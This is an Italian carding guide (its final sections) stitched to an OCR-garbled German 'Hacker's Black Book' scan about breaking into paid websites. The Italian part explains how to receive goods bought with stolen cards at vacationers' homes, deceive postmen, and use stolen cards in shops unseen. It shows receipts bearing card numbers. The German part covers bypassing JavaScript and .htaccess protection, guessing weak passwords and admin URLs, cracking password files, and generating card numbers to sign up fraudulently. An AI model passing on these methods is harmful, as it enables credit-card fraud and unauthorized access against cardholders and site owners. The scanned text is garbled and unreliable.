Accessori utili quindi per questo tipo di azione sono proxy, webproxy, abbonamenti altrui oppure abbonamenti attivati da 
noi con dati anagrafici falsi. (vedi precauzioni) 

In questo caso è praticamente obbligatorio usare tutte le precauzioni che ho già elencato, in particolare abbonamenti falsi, 
ecc.. 


Dopo che avete fatto tutta la trafila eccovi in un bel sito dove vendono roba on line. Bello.. Adesso prendo quello che mi 
piace e me lo faccio spedire direttamente a casa, magari a nome dei miei genitori. BRAVO !!! 

Questo è il modo più semplice e veloce per trovarsi i pulotti (per chi non lo sapesse trattasi di poliziotti) a casa che ti 
sequestrano il computer tra le lacrime di tua madre e tuo padre che ti chiede cosa hai fatto. Spero che a nessuno di voi capiti 
una cosa del genere, ma mettetelo sempre in preventivo. Fa parte della vita che abbiamo scelto. 


Fare acquisti on line è una questione di arte, raffinatezza e tanta, tanta, tanta fortuna !! 

Come avete capito non possiamo certo farci spedire la roba a casa nostra, ci serve un altro indirizzo dove farci recapitare la 
roba. E allora che fare ? 

Bhè, possiamo fare acquisti on line per conto di altri. Avete un vicino di casa (non troppo vicino) che vi rompe sempre le 
palle ? Andate su un sito di materiale pornografico e comprategli falli di plastica (magari è auto-sodomita.. :-). 

Oppure potete comprargli roba offensiva. Riviste erotiche (immaginatevi che figura di merda !!!) e quanto altro vi possa 
venire in mente. Se è un uomo speditegli a casa lingerie femminile.. Fa sempre un certo effetto :-)) 


Tralasciando gli scherzi, come fare a comprare qualcosa per noi ? La faccenda qui si fa dura.. Risolviamo sempre la 
faccenda tra vicini, no ?? 

Mi spiego meglio: potreste usare la casa dei vicini (che sono andati in vacanza) per ricevere delle riviste o al limite dei libri. 
Infatti quelli potrebbero anche starci nella casetta delle lettere. Ma per pacchi più grandi e ingombranti ? La storia di 
mettere una cassetta in mezzo alla campagna non funziona per i pacchi. Al massimo il postino lascia un bigliettino dove 
dice di andare a ritirare il pacchetto all'ufficio postale oppure se proprio avete un culo pazzesco potrebbe chiedere al vicino 
di casa (che guarda caso siete voi..) di consegnarglielo poi. Ma il rischio è troppo alto. La cosa migliore sarebbe quella di 
farsi trovare dal postino nel giardino della casa dove il pacco va consegnato e spacciarvi per il figlio dei proprietari della 
casa. Anzi no, meglio farsi passare per il figlio di amici dei proprietari e dite che i proprietari e i vostri genitori sono andati 
a farsi un giro e li state aspettando, dato che non avete le chiavi e siete tornati prima del previsto. Come scusa dovrebbe 
reggere. In questo modo il postino (se non è uno pignolo) dovrebbe tranquillamente consegnarvi il pacco. ATTENZIONE 
!!! Non fatelo in paesi piccoli o se i vostri genitori sono conosciuti nella città. Infatti il postino potrebbe riconoscervi e 
dirvi: "Ma tu non sei il figlio dei..." e allora sarebbero cazzi. 


La cosa migliore a questo punto sarebbe usare l'indirizzo di una casa di gente in vacanza (o anche una casa abbandonata, se 
non è proprio in decadenza) e provare a lasciare un biglietto nel quale si autorizza il postino a lasciare davanti alla porta di 
casa. Ma ho i miei dubbi che il postino ci cascherebbe. Se per disgrazia (in qualsiasi caso) il postino lascia un biglietto nel 
quale si invitano i veri proprietari ad andare a ritirare il pacchetto all'ufficio postale fate in modo di far sparire il biglietto, 
per evitare conseguenze che potete bene immaginare. 


DOPPIA ATTENZIONE: se volete fare acquisti via Internet leggetevi BENE le sezioni "Sapete cosa sono le tre Y ?" e 
"Cos'altro guardano i venditori ?" 


ACQUISTI DI MERCE IN NEGOZIO 

Rischio: **** 

Tipo di carta necessario: Potete usare questo trucco solo se avete fisicamente in mano una carta di credito 
Svolgimento: 

Qui si gioca veramente con il fuoco... Io la definirei una vera e propria mission impossible. 


In questo caso vi servono solo due cose: dovete avere tra le mani una carta di credito e dovete avere un coraggio pazzesco. 
Ammetto che io non ho mai fatto una cosa del genere. Né ne avrei mai il coraggio. 

Però avrei una mezza idea di come farlo. Più che una mezza idea è un'idea bella e buona (e vi assicuro) che funziona. 
Almeno dovrebbe. 


Allora.. Dovete solo avere una carta di credito tra le mani e avere (o dimostrare) 18 anni. O di più che non fa male. 

Andate in un negozio (distante da dove abitate, magari in una città vicina [10 km] ) e comprate qualcosa. Dopo di che 
dirigetevi alla cassa e date alla commessa alla cassa la cc. 

Se avete coraggio (e ce ne vuole molto..) potete anche chiedere alla cassiera di battere un importo superiore a quello che 
dovete pagare e di darvi la differenza, dato che siete a corto di soldi. Ma attenti. La commessa potrebbe insospettirsi e allora 
potrebbe chiedervi un documento. E allora.. 


Date alla commessa alla cassa la carta di credito e quello che volete comprare e aspettate che esca lo scontrino. Non 
cominciate a guardarvi in giro innervositi ed evitate in ogni modo di sudare o di sembrare nervosi. Sarebbe la vostra rovina. 
Mettetevi un cappellino nel disgraziato caso ci siano delle telecamere. Calma e sangue freddo. Lo scontrino sta per 
arrivare.. 

Eccolo, sentite la macchina vibrare.. Cazzo, muoviti. 

Appena arriva lo scontrino firmatelo (con uno scarabocchio, tanto nessuno controlla mai la firma) e andate. 


APPENA FUORI NON BUTTATE VIA LA COPIA CHE VI HA DATO LA COMMESSA. Dovete distruggerlo. 
Accendetelo, buttatelo in un cesso pubblico, fate quello che vi pare, evitate comunque di tenervelo addosso per troppo 
tempo. 

Mi raccomando: appena fuori dal negozio non cominciate a correre come pazzi. Potrebbero capire tutto. Uscite tranquilli. 
Un'altra raccomandazione: non parcheggiate la macchina (o il motorino) vicino al negozio.. 

Se la parcheggiate lontano ci sarà meno gente che vedrà la targa. 

Dopo di che tornate a casa. Ormai al sicuro. Fate sparire eventuali scontrini e.. A posto, siete al sicuro. 

Sudato freddo, vero ? 


ATTENZIONE. Come ho potuto scoprire nella mia "breve" esperienza di carding alcune carte di credito tedesche e 
olandesi in particolare hanno sulla facciata anteriore anche la foto del proprietario. Io non le userei per fare acquisti, la foto 
salta subito all'occhio e se magari c'è un uomo con i capelli neri e voi siete biondi, oppure con i baffoni mentre voi non 
avete neppure un accenno di barba.. Help me!!! 


Un paio di esempi di scontrini. 


Questa è la classica zona dove casca l'asino.. La prima difficoltà che molti trovano entrando nel mondo del carding è il fatto 
di non sapere leggere gli scontrini... Come ?? Ma non ci hai fatto uno schema prima ? 

Sì, vi ho fatto uno schema su come leggere gli scontrini, ma quello era uno schema - esempio. Infatti le "macchinette" che si 
usano per fare i pagamenti con le carte di credito sono decine. E gli scontrini non sono sempre uguali tra loro, si 
differenziano. Ricopio qui sotto un paio di scontrini per farvi vedere come possono essere diversi, sia nelle voci che nel loro 
ordine. 
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BANKAMERICARD <====== TIPO DI CARTA DI CREDITO 

Esso 3434 D 1 <======NOME DEL NEGOZIO DOVE E' AVVENUTO IL PAGAMENTO 
via Nazioni Unite <======INDIRIZZO DEL NEGOZIO 

20100 MILANO <======INDIRIZZO DEL NEGOZIO 

S/E-CE 1609065 <======??????? (chi conosco il significato di questo numero mi scriva) 
TERM-ID: 09869146 <======NUMERO DEL TERMINALE 

DATA: 28/06/00 11:55 <======DATA E ORA DELL'OPERAZIONE 

N. TRANS: 000015 C:S <======NUMERO DI TRANSAZIONE 

RIFERIMENTO: 00000015 <======NUMERO DI RIFERIMENTO DELLA TRANSAZIONE 
5413302729349662 0105 <====== NUMERO DELLA CARTA DI CREDITO E SCADENZA 
AUT. 9VHA05 CAUS. 875 <======NUMERO AUTORIZZAZIONE E CAUSALE 


ACQUISTO CARTA CREDITO <======CAUSALE IN CHIARO 


IMPORTO LIRE 70.400 <======IMPORTO DELL'OPERAZIONE IN LIRE 
FIRMA CLIENTE 


CONTROV. EURO: 36,36 


TRANSAZIONE ESEGUITA <======STATO DELLA TRANSAZIONE 

Grazie e Arrivederci <======FORMULA DI COMMIATO 
13\=/=\=/=\=/=\=/X\=/F\=/F\=/X\=/F\=/F\=/=\=/=\=/=\=/=\=/=\=/=\=/\#/\#/\/\=/A\=/F\=/F\=/=\ 

DINERS <====== TIPO DI CARTA DI CREDITO 

Esso 3434 D 1 <======NOME DEL NEGOZIO DOVE E' AVVENUTO IL PAGAMENTO 
via Nazioni Unite <======INDIRIZZO DEL NEGOZIO 


20100 MILANO 
S/E-CE 0005183365 
TERM-ID: 09869146 


DATA: 28/06/00 11:23 <======DATA E ORA DELL'OPERAZIONE 

N. TRANS: 000012 C:S <======NUMERO DI TRANSAZIONE 

RIFERIMENTO: 00000012 <======NUMERO DI RIFERIMENTO DELLA TRANSAZIONE 
3623001260010 0205 <====== NUMERO DELLA CARTA DI CREDITO E SCADENZA 
AUT. 8135 CAUS. 875 <======NUMERO AUTORIZZAZIONE E CAUSALE 

ACQUISTO CARTA CREDITO <======CAUSALE IN CHIARO 

IMPORTO LIRE 60.000 <======IMPORTO DELL'OPERAZIONE IN LIRE 

FIRMA CLIENTE 


FIRMA DEL TITOLARE DELLA CARTA 
CONTROVALORE IN EURO 


CONTROV. EURO: 30,99 


TRANSAZIONE ESEGUITA <======STATO DELLA TRANSAZIONE 

Grazie e Arrivederci <======FORMULA DI COMMIATO 
/A\=/A\=/>\=/3\=/P\=/>\=/3\=/P\=/3\=/3\=/P\=/3\=/3\=/P\=/3\=/3\=/P\=/3\=/P\=/R\=/3\=/=\=/F\=/=\ 

PAGO BANCOMAT <=====TIPO DI CARTA DI DEBITO 

STAZ. SERV. FINA CREMONA <======NOME DEL NEGOZIO DOVE E' AVVENUTO IL PAGAMENTO 
VIA BAKUNIN- 10 <======INDIRIZZO DEL NEGOZIO 

ESERC. STAB. OPER. POS. <======TIPO DI POS IN USO 

0406646 0001 00001 001 <======IDENTIFICATIVO DEL TERMINALE 

DATA: 27/06/00 12:17 <======DATA E ORA DELL'OPERAZIONE 

N. TRANS: 000020 <======NUMERO DELLA TRANSAZIONE 

RIFERIMENTO: 0000000020 <======RIFERIMENTO DELLA TRANSAZIONE 

CODICE ABI 35995 <======COORDINATE BANCARIE DEL PROPIETARIO DEL BANCOMAT 
CARTA N. 080430722024 <======NUMERO DEL BANCOMAT 

ADDEBITO CAUSALE 871 <======CAUSALE PAGAMENTO 

IMPORTO LIRE: 100.000 <======IMPORTO LIRE 

CONTROV. EURO: 51,65 <=====CONTROVALORE IN EURO 

TRANSAZIONE ESEGUITA <=====STATO DELLA TRANSAZIONE 
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Come potete notare nell'ultimo "scontrino" non ho messo niente in neretto... Xke' ? Perché l'ultimo scontrino si riferisce a 
uno scontrino di una carta di debito (vedi prima parte della guida) e di questo non ce ne facciamo niente. Avete capito il 


FAQ (Frequently Asked Question) 


Eccoci qua, questa finalmente è l'ultima parte di questa guida.. Spero che vi fin qua vi sia piaciuta. Qui troverete le 
domande che chi comincia con il carding si pone più spesso. Tenterò di rispondere a tutti i quesiti che vi possono sorgere, 
se non trovate qui una risposta alle vostre domande scrivetemi pure e nelle prossime guide pubblicherò (e risponderò) 
pubblicamente alle vostre domande. Naturalmente prima vi spedirò in privato la risposta. 

Q= Question (domande) 

A= Answer (risposta) 


Q: Ho un casino di scontrini senza firma, che me ne faccio ? 

A: Hai degli scontrini senza firma ? Controlla bene. Probabilmente sono degli scontrini di carte di debito (vedi schema qui 
sopra). Infatti gli scontrini di carte di credito DEVONO (per legge) essere firmati, se non sono firmati il titolare della carta 
di credito può fare ricorso e dire che lui non ha mai effettuato quella operazione. E se il commerciante non è in grado di 
fornire lo scontrino firmato deve restituire i soldi oltre a rimborsare le spese della parta danneggiata. 


Q: Ho capito cosa sono i proxy.. Ma dove possono trovarne delle liste? 
A: Puoi trovare delle liste di proxy sulle e-zine di hacking (vedi sito del Tank Commandos), su www.cyberarmy.com/lists, 
su http://proxys4all.cgi.net 


Q: Cos'è un abbonamento flat ? 

A: Questa domanda non è molto inerente al carding, comunque... Un abbonamento flat è un abbonamento che tramite una 
quota mensile (per adesso) permette di navigare su Internet 24 ore su 24 senza pagare scatti, collegandosi cioè tramite dei 
numeri verdi. Mentre scrivo sono attivi gli abbonamenti flat di Galactica (70.000 £ al mese) e di Wind (60.000 £ al mese). 


Q: Dove posso trovare i generatori automatici ? E il GenerID ? 
A: Puoi trovare tutti i programmi che ho nominato nella guida sul sito del Tank Commandos 


Q: Qual è l'indirizzo del sito del Tank Commandos ? 
A: Mi sembrava di averlo già scritto comunque http://go.to/tankcommandos 


Ringraziamenti 


Vorrei ringraziare: 

Tutti coloro che hanno scritto qualcosa sul carding e da cui ho pian piano imparato questa favolosa arte. 
XantriX, che mi ha spinto con le sue domande a scrivere la versione 2 di questa Guida al Carding 

Bakunin, non ti conosco di persona ma per me sei il + grande.. Grazie di esistere Michael !! 

BsTHaCk, se di guide come la mia ce ne sono centinaia xke' la stai leggendo ? 

Tutti quelli di #lamer (irc.tin.it)... Ragazzi, siete grandi !! 

Tutti quelli che mi hanno mandato a fanculo quando me lo meritavo.. E ci sono volte in cui me lo merito !!! 
Fritz, che mi ha promesso di consigliare questa guida nelle FAQ di alt.hackers.cough.cough.cough 


Crediti & Books 
Qui troverete i testi da cui ho preso spunto (nota: ho preso spunto, non ho copiato spudoratamente... E se li leggete noterete 


che la mia guida è diversa e che concetti espressi qui non sono presenti da altre parti.. Che sappia io) e che vi consiglio se 
volete diventare dei buoni "cardatori". 


-"L'arte del Carding" scritto da Killexx - lo trovate su Newbies 3 

-"Guida di base al Social Engeering" scritto da Techno Knight - lo trovate sul Cookbook di Techno Knight 
-"Guida al carding" scritto da Techno Knight - lo trovate sul Cookbook di Techno Knight 
-"Come hakkare un sito porno" scritto da _pOnico_ - lo trovate su Newbies 1 

-"Trashing che passione!!" scritto da HarLok - lo trovate su Newbies 3 

-"Utilizzare carte di credito.." scritto da Avatar - lo trovate sul Cookbook di Avatar 


-"Ho mangiato pane e volpe" scritto da Romolo Pranzetti - lo trovate su Inter.net n. 51 


gescannt von: 


B I T L E S "new-hackerz@gmx.de" 


Jo Hallo erstmal! Ich hab heute fur euch Hacker's Black Book gescannt 
(kostet normal 30 DM)! In diesem 20 Seiten langen Buch gibt es 
andeutungen darauf wie man hackt, genaures findet man dann schon 
selber raus! 


***£*Vorwort zum Scannen!!!**** 

Ich habe das Buch ja mit Texterkennung gescannt, da kann s natùrlich 
vorkommen, das statt einem U ein Ù oder umgekehrt erkannt wird, oder 
das statt rn einfach ein m erkannt wird. 

Beispiel: pornsite = pomsite 


Hacker's Black Book 


Dieser Report ist in zweierlei Hinsicht hilfreich. Er soll Menschen, die ihr Passwort 
verloren haben, die Méglichkeit geben, es durch Anwendung einfacher Techniken ohne 
lange Wartezeiten zuritckzubekommen und Besitzem von Websites mit geschiitztem 
Inhalt ermòglichen, diese Inhalte zu schiitzen. 

Webmaster, die die in diesem Report beschriebenen Techniken kennen, haben 
wesentlich bessere Aussichten, Ihre Website sicher gegen Eindringlinge zu schiitzen. 


Unter der URL: 

http ://zaehlwerk.de/banner/secure/ 

befindet sich der Mitgliedsbereich zu diesem Report. 

Dort finden Sie Utilities und Tools, um die in diesem Report 
beschriebenen Techniken nachzuarbeiten. 

Ihr Login: Ihr Passwort: 


Hacker's Black Book 
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JavaScript-Passwortschutzsysteme 
Die einfachste Art von Passwortschutzsystemen ist der sogenannte JavaScript-Schutz. 


Dabei wird der Benutzer beim Betreten einer Seite oder beim Anklicken eines 
bestimmten Links dazu aufgefordert ein Passwort einzugeben. Diese Art von Schutz ist 
sehr einfach und bietet nur ein Minumum an Schutz. 


#-put_your_title_here - Netscape. a DAS BOO 


Beim Betrachten des HTML-Quellcodes der Seite findet sich dann oftmals ein 
JavaScript-Code ahnlich dem folgenden: 


<head><title> Website-Titel </title> <script> 
function jprot() { pass=prompt("Enter your password", "password"); 


if (pass == "nasenbaer") { 
document.location.href="http://protectedserver.com/index.html"; 
} eise { 


alert( "Password incorrect!" ); 
</script> </head> 


Wie man sieht, wird das eingegebene Passwort verglichen und bei Korrektheit an eine 
angegebene URL gesprungen. Nun sieht man, wie das Passwort zu heifsen hat und kann 
es einfach eingeben oder direkt die Ziel-URL wahlen. 


Oft wird auch das Passwort benutzt, um eine Ziel-URL zu generieren. Beispielsweise 
kònnte die geheime Ziel-URL http://members.protectedserver.com/members/hu8621 
s.htmL das Passwort ,,hu8621s" wiirde als Teil der URL kodiert. Die entsprechende 
Schutz-Funktion im HTML-Code der Seite sàhe dann folgendermaften aus: 


function jprot() { 
pass=prompt("Enter your password","password"); 
document. location. href="http://members.protectedserver. com/members/"+pass-+- 


". html" ; 

Hier besteht mehr Schutz als in der ersten Variante, allerdmgs sind die Verzeichnisse 
mittels des HTTP-Servers oft nicht gegen unerlaubtes listen des Verzeichnisses 
geschiitzt. Wahlt man mittels des Browsers die URL 
http://members,Drotectedserver.com/members/ direkt in den Browser, so erhalt man 
oftmals eine Auflistung aller HTML-Seiten in diesem Verzeichnis, also auch die Seite, 
die iiber den JavaScript-Passwortschutz angesprungen wird. 


HTACCESS-Passwortschutzsysteme 
Fast alle heute eingesetzten Webserver beherrschen den sogenannten HTACCESS- 


Passwortschutz. Zuerst wurde er vom Apache-webserver eingesetzt, mittlerweile sind 
jedoch viele andere Webserver zum HTACCESS-Standard kompatibel. Daher wird er 
auch sehr haufig von sogenannten Paysites eingesetzt. Z.B. die Websites 
www.playgal.com oder www.hotsex.com setzen diesen Schutzmechanismus ein. 

Eine Website, die HTACCESS einsetzt, ist daran zu erkennen, daft bei betreten des 
Mitgliedsbereichs ein Popup-Dialog erscheint (NICHT JavaScript-generiert), der 
folgendermafsen aussieht: BILD FEHLT (SORRY!) Um die Arbeitsweise dieses 
Schutzes zu verstehen, sollte man einige Grundlagen des Unix-Betriebssystems kennen. 
Unter Unix (bzw. Linux, BSD etc.) und auch unter Windows-Webservem wie dem 
Microsoft US sind die HTML-Dokumente wie auch bei einem normalen PC hierarchisch 
in Verzeichnisstrukturen angeordnet und abgelegt. Man spricht hier insbesondere von 
einer ,,Baumstruktur". Die Wurzel des Baumes (engl. ,,Root") ist die Domain selber 
ohne weitere Informationen. Zum Beispiel www.ibm.com ist die Domain und diese ist 


das Root der Verzeichnisstruktur. 


|-|.-#root 
| |-|.-#members | |..-#secure |....#public 


Wenn in dem Verzeichnis "secure" nun die zu schiitzenden HTML-Dokumente und 
Grafiken liegen wiirden, so miiffte in diesem Verzeichnis nun ein HTACCESS-File 
abgelegt werden. Das File mu den Namen ".htaccess" (mit Punkt davor) tragen. Das 
HTACCESS-File legt fest in welcher Datei die Passwòrter liegen und aufweiche Art das 
Verzeichnis zu schiitzen ist. Das HTACCESS-File sieht folgendermafien aus: 
AuthUserFile /usr'home/myhomedir/passes AuthName MyProtectedSite AuthType 
Basic. 

<Limit GET POST PUT> require valid-user </Limit> 


Diese HTACCESS-Datei legt fest, da das Passwortfile die Datei 
/usr/home/myhomedir/passes auf dem Server ist. Sinnvoller Weise sollte 
die Passwort-Datei nicht im Bereich der HTML-Dokumente liegen, also 
nicht via WWW zugehbar sein. Die Optionen "AuthName" gibt an, welche 
Bezeichnung im PopUp-Dialog erscheinen soll (im Dialog oben 
beispielsweise "playgal"). 

Das interessante am HTACCESS-Schutz ist, dat durch das HTACCESS-File 
auch alle iinterverzeichnisse unterhalb des Verzeichnisses, in dem sich die 
HTACCESS-Datei befindet, mitgeschiitzt sind. Und dies bis zu einer 
beliebigen Tiefe. In unserem Beispiel kònnte man also unterhalb des 
Verzeichnisses "secure" beliebig viele weitere Verzeichnisse anlegen. Diese 
wéren alle geschiitzt. 

Wie sieht nun die Passwort-Datei selber aus? Im Folgenden eine 
beispielhafte Passwort-Datei: 

robert:$1$4A$JRLOVAdCRzYtbpekrLBYz]/ 
manfred:$1$30$ddEyR1dHykHUo0654KEO01i/ 
thomas:$1$sa$09grRUELps.nkqkRIWLA/Ge/ 

Fiir jedes Mitglied enthàlt die Passwortdatei eine Zeile, die aus zwei Teilen 
besteht, die durch einen Doppelpunkt getrennt sind. Der erste Teil ist der 
Login-Name, der zweite Teil enthélt das Passwort in verschliisselter Form. 
Diese Verschliisselung ist sehr sicher. Sie ist maschinenspezifisch. Das heift, 
daft selbst wenn man diese Passwortdatei in die Finger bekommen wiirde, 
kònnte man aus den verschliisselten Passwértern nicht die wirklichen 
Passwòrter zuriickberechnen. Bei der Passworteingabe wird das Passwort 
durch die Unix-Systemfiinktion "crypt()" kodiert und mit dem in der 
Passwortdatei abgelegten verschliisselten Passwort verglichen. Ist es gleich, 
so ist der Login OK. 


Wie man also erkennen kann, ist es sehr schwierig, in Websites, die mittels HTACCESS 
geschiitzt sind, zu gelangen. Allerdings sind manche Webmaster einfach zu dumm, den 
HTACCESS Schutz richtig einzusetzen, und bieten so dem Angreifer einige 
Mòglichkeiten. 


Schwache Passwòrter 
Ein schwaches Passwort ist ein Passwort, daf leicht erraten werden kann. Hier einige der 
am haufigsten eingesetzten Usemame/Password Kombinationen: 


asdf/asdf 

123456/123456 

fuck/me 

qwertz/qwertz 

qwerty/qwerty 

qlw2e3 

abcl23 

Besonders die groben Pay-Websites, die einige tausend Mitglieder haben, ist es sehr 


wahrscheinlich, daft solche ,,schwachen" Passwòrter dabei sind. Aufterdem mu man 
sich vorstellen, daf einige Mitglieder in vielen verschiedenen Websites Mitglied sind 
und sich nicht alle mòglichen Passwéòrter merken wollen. 

Daher wird auch oft der Name der jeweiligen Website von den Mitgliedern als Passwort 
gewahlt. 

Beispiel: 


www.hotsex.com: username: hot, password: sex www.hotbabes.com: username: hot, password: babes 


Oder die Mitglieder benutzen einfach nur ihren Namen. Dabei sind natiirlich die am 
haufigsten vorkommenden Namen besonders interessant: 


Im Amerikanischen zum Beispiel 
john/smith john/john miller/miller rick/rick frank/frank 


und weitere mehr. Im Deutschen sind natiirlich andere Namen interessanter. 

Der einfach zu merkende Login bestehend aus ,,usemame/password", so wie er auch im 
Passwort-Dialog gefragt wird, kommt auch hdufig vor. 

Das schwàchste von allen Passwòrtem ist allerdings das sogenannte , ENTER" - 
Passwort. Dabei mu beim Erscheinen des Passwort-Dialogs einfach bestàtigt werden, 
ohne ilberhaupt etwas einzugeben. Hat nàmlich der Webmaster beim Erzeugen neuer 
Mitglieds-Daten einfach ohne eingabe irgendwelcher Daten aus versehen einmal 
unbemerkt sein Tool gestartet, so befindet sich im Passwort-File ein eben solcher 
»leerer" Eintrag. 


An den engagierten Webmaster richten sich folgende Sicherheitstips: 
* Das Erzeugen ,,leerer" Passwòrter verhindern und kontrollieren 
* Die Mitglieder nicht die Passwòrter selber wahlen lassen, sondern eines per Zufall 


generieren (z.b. ,,kd823j0g") 
* Falls die Kunden ihre Usemame/Password-Kombination selber wahlen diirfen, nicht 
zulassen, da der Usemame gleich dem Passwort ist. 


Direktes Hacken der Passwort-Datei 
Normalerweise sollte es nicht mòglich sein, an das Passwort-File zu gelangen. In einigen 


Fallen ist es jedoch méglich, daran zu kommen, und zwar in folgenden Fallen: 


* Die Passwort-Datei liegt im public_html-Bereich des Webservers, 
also in den Verzeichnissen, in denen auch die via WWW 
zuginglichen HTML-Dokumente liegen » Auf dem Webserver haben viele User 


einen eigenen virtuellen 


Webserver 
Der zweite Fall tritt dann auf, wenn der Website-Betreiber seinen Webserver bei einem 


groben Webspaceprovider mietet, der auf einem Rechner viele weitere Webserver 
betreibt (z.B. www.webspace-service.de, www.webspace-discount.de, 


www.simplenet.com etc.) Dann ist es méglich, an die Passwortdatei zu kommen, falls 


man auf dem gleichen Rechner einen Account hat und die Passwortdatei òffentlich 
lesbar ist. Dann kann man mittels FTP oder TELNET in das Verzeichnis wechseln, 
indem derjenige seine Passwortdatei aufbewahrt und diese lesen. Mittels eines Brute- 
Force-Passwort-Crackers wie ,,Crack V5.0" lassen sich dann die Passwòrter 
zuriickberechnen. Das Programm braucht allerdings oft viele Stunden dazu und es fiihrt 
nicht immer zum Erfolg. 

Fiir einen absolut sicheren Schutz sollte also der Webmaster seine Paysite nicht auf 
einem Webserver betreiben, den er sich mit anderen Websites teilen mufì. 


Die Admin-Tools 
Viele Webmaster der Paysites haben einen sogenannten ,,Admin-Bereich", der nur fiir 


sie selber gedacht ist. Dort erzeugen Sie neue Passwòrter oder lòschen alte Passwòrter 
etc. Oft liegen diese Admin-Bereiche jedoch nicht in einem Passwortgeschiitzten 
Bereich. Die Webmaster denken nimlich, es wiirde ja keiner die URL ihres Admin- 
Tools kennen. Aber die URL ist manchmal einfach zu erraten. Oft heiftt die URL 


www.thepaysite.com/admin.htm www.thepaysite.com/admin.html oder 
www.thepaysite.com/admin/ 


Man sollte auch weitere Namensmòglichkeiten austesten. Denn gelingt es, an 
die Admin-Seite zu kommen, so ist man natiirlich am allerbesten bedient: 
Man kann selber so viele neue Passwòrter hinzufiigen, wie man méchte! 
Phreaken 

Unter ,,Phreaken" versteht man den einsatz von falschen Informationen, um 
sich bei einer Paysite als neues Mitglied zu registrieren. Das ist natirlich 
verboten und diese Hinweise hier sollen in erster Linie den Webmastem 
dienen, damit sie sich vor solchem MiBbrauch schiitzen kònnen. 

Wir wollen hier den am weitesten verbreiteten Fall beschreiben, bei dem die 
Mitgliedschaft online via Kreditkarte bezahlt wird und danach sofortiger 
Zugang erteilt wird. 

Phreaker benutzen dazu einen anonymen Intemetzugang. Dazu wird oft der 
Test-Zugang von AOL mifbraucht. Test-Mitgliedschaften finden sich nahezu 
in jeder Computerzeitung. Aber auch okay.net bietet sofortigen Zugang nach 
Angabe aller Daten. Dabei meldet man sich mit Phantasienamen und 
irgendeiner Kontoverbindung an, die man aus irgendeiner Rechnung oder 
sonstwo her kennt. Schon ist man einen Monat lang anonym via AOL oder 
okay.net im Internet unterwegs. 

Desweiteren benòtigt man eine ,,giltige" Kreditkarten-Nummer 
(vorzugsweise VISA oder Mastercard - in Deutschland Eurocard). An diese 
zu kommen, ist schon etwas schwieriger. Fine gingige Methode ist es, einen 
sogenannten ,,Credit-Card-Generator" wie z.b. ,,Credit Wizard" oder 
,».Cardpro" oder ,,Creditmaster" einzusetzen. Ein Suchern mittels 
,metacrawler.com" und den Begriffen ,,Credit Card Generator" o.a. bringt oft 
schon die gewiinschten Programme. 

Dazu sollte man wissen, da£ die Online-Transaktionszentren nicht genau iberpriifen 
kònnen, ob eine Kreditkartennummer wirklich existiert und wem sie gehòrt. Es gibt 
lediglich bestimmte Algorithmen, um die Nummer und die Giiltigkeitsdaten einer 
Kreditkarte auf eine giiltige Struktur hin zu iiberpriifen. Daher kann man bei der 
Anmeldung beliebige Namen und Adresse angeben und eine der generierten Nummern. 
Allerdings liefern die Generatoren nicht das dazugehéòrige Giiltigkeitsdatum. 

Jedoch gibt es einen einfachen aber recht wirksamen Trick, um Kartennummem mit 
richtigem Giiltigkeitsdatum zu erhalten: Die meisten der obengenannten Programme 
bieten die Mòglichkeit, aus einer real existierenden Kreditkarten-Nummer neue 


Nummern zu generieren. Dieses Verfahren wird ,,Extrapolation" genannant. Die 


generierten Nummern unterscheiden sich meist nur in den letzten Stellen und da die 
Kartennummem bei den Kreditkarten-Herausgebern in der Regel in aufsteigender 
Reihenfolge vergeben werden, haben die so generierten Kartennummem meistens das 
Giiltigkeitsdatum der Karte, von der aus extrapoliert wurde. Folgender 
Bildschirmauszug zeig den Extrapolationsvorgang: 


| ad Beadiy Card Generator 1.0 


{1 4013 1821 0817 7497 


1.1 40138653 1092 0619 
11 4013 8826 7532 7798 


f 4013 7584 3750 5530 inci 4231 - Chase Lincoln First Classic di ff ki 


Dabei kann man seine eigene, realexistierende Kreditkarte nehmen und aus ihrer 
Nummer neue Kartennummem berechnen. Das Giiltigkeitsdatum ist dann mit gròftter 
Wahrscheinlichkeit bei den 


extrapolierten Nummern identisch mit dem Giiltigkeitsdatum der eigenen, 
realen Kreditkarte. 

Dabei braucht der Benutzer dieser Techniken keine Angst zu haben, da man 
ihn zuriickverfolgen kann. Der Zugang mittels anonymer AOL-Testzuginge 
bietet maximalen Schutz. Steht kein solcher Zugang zur Verfiigung, sollte 
ein "Anonymizer" benutzt werden. Einen solchen findet man beispielsweise 
unter www.anonymizer.com. Surfman iber den Anonymizer, ist die IP- 
Adresse nicht zuriickverfolgbar. Eine etwas schwéachere Variante, seine IP- 
Adresse zu verstecken ist die, einen Proxy-Server zu benutzen. Die meisten 
Intemet-Zugangsprovider bieten die Mòglichkeit an, iiber einen Proxy zu 
surfen. 

Aber Achtung: Benutzen man seinen eigenen Internet-Zugang, also keinen 
anonymen AOL-Zugang oder Anonymizer oder Proxy, so kann der Betreiber 
der Website, bei dem man sich mittels der falschen Kreditkartendaten 


anmeldet, mittels der IP-Adresse, die der Server protokolliert, herausfinden, 
wer ihn betrogen hat bzw. es versucht hat. Dazu braucht er lediglich Ihren 
Zugangsprovider zu kontaktieren und ihm die IP-Adresse mitzuteilen. Die 
Provider fiihren i.d.R. iiber die letzten 80 Tage ein Protokoll, wann wer mit 
welcher IP-Adresse online war. 

Login-Name Checker 

Manche Pay-Sites geben méglichen neuen Mitgliedern wahrend der 
Anmeldungsprozedur bereits vor der eigentlichen Zahlung die Méglichkeit, 
einen Mitgliedsnamen zu wàahlen. Ist der gewiinschte Name bereits vergeben, 
wird dies mitgeteilt und man soll einen anderen Namen wàahlen. Gibt man 
beispielsweise ,,John" als Mitgliedsnamen ein, so sagt der Server meistens, 
daf der Name bereits vergeben ist. Das ist natiirlich eine prima 
Vorraussetzung fiir die oben genannten Tricks zum Erraten von Passwértem. 
Denn nun weif man, daf es zumindest den Namen ,,John" schon gibt, somit 
mu£f nur noch das entsprechende Passwort erraten werden. Das ist eine 
wesentliche bessere Ausgangslage. als wenn man Passwòrter zu 

Usernamen erraten muB, von denen man gar nicht weiB, ob sie iiberhaupt existieren! 
Als Webmaster einer Paysite sollte man also darauf achten, da das Neumitglied erst 
nach verifizierter Zahlung seinen Usemamen wahlen kann! 

Login-Generator nicht sicher 

Oftmals ist es so, daf$ das Neumitglied zur Zahlung von der Paysite zu einem 
Kreditkarten-Service geschickt wird (z.b. www.ibill.com). Nach Verifizierung der 


Zahlung kommt der Neukunde dann wieder zu den Seiten der Paysite und wird dort 

